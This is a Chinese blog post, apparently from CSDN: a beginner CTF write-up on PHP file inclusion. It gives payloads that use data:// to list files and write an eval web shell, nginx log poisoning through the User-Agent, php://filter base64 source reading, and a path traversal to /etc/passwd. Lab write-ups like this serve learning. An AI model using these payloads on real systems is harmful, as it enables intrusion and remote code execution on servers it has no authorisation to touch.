CTF入门之php文件包含

一.php伪协议执行代码
在这里插入图片描述
由图可知,只需要通过get请求传送url变量即可触发include函数,一开始的思路是直接才flag的文件名,如flag.php等等,然后都失败了,然后想到了文件包含漏洞,利用php伪协议。

https://blog.csdn.net/yao_xin_de_yuan/article/details/108326427 php伪协议介绍

这里有两种方法:
1.url=data://text/plain,<?php print_r(glob("*")); ?> 通过通配符查找目录下的所有文件
在这里插入图片描述
找到两个文件,其中ctf_go_go_go文件中即为flag
在这里插入图片描述
2. 构造url=data:text/plain,<?php fputs(fopen("shell.php","w"),"<?php eval($_POST['h']);?>")?> 然后使用菜刀或蚁剑进行连接即可。

在这里插入图片描述
连接成功,打开相关文件即可。

二.日志注入
在这里插入图片描述
题目和上题一样,但用php伪协议是发现发生错误,所以应该是过滤了php,然后就可以进行日志注入。可以服务器问nginx,所以其日志目录为/var/log/nginx/access.log和/var/log/nginx/error.log

因此构造url=/var/log/nginx/access.log

发现日志会记录请求方法和user-agent 因为请求方法不能变,因此我们可以在user-agent处插入php代码,利用bp将user-agent字段改为<?php eval($_POST['h']);?> 发送后发现日志文件中的ua处为空,这是因为php代码会直接运行,而不会显示。然后我们用菜刀或蚁剑连接即可,但要注意url
在这里插入图片描述
进入后随便翻翻即可找到flag。

3.php伪协议读取文件

在这里插入图片描述
题目url如图,因为页面中并无明确提示,因此可以利用php伪协议读取文件内容看一下

构造url:?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述
可以看到文件内容经过base64编码,我们解码一下即可得到flag
在这里插入图片描述
最后补充一下,include包含文件时,用/分隔可以包含多个文件。如file=source.php/../../../../etc/passwd

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值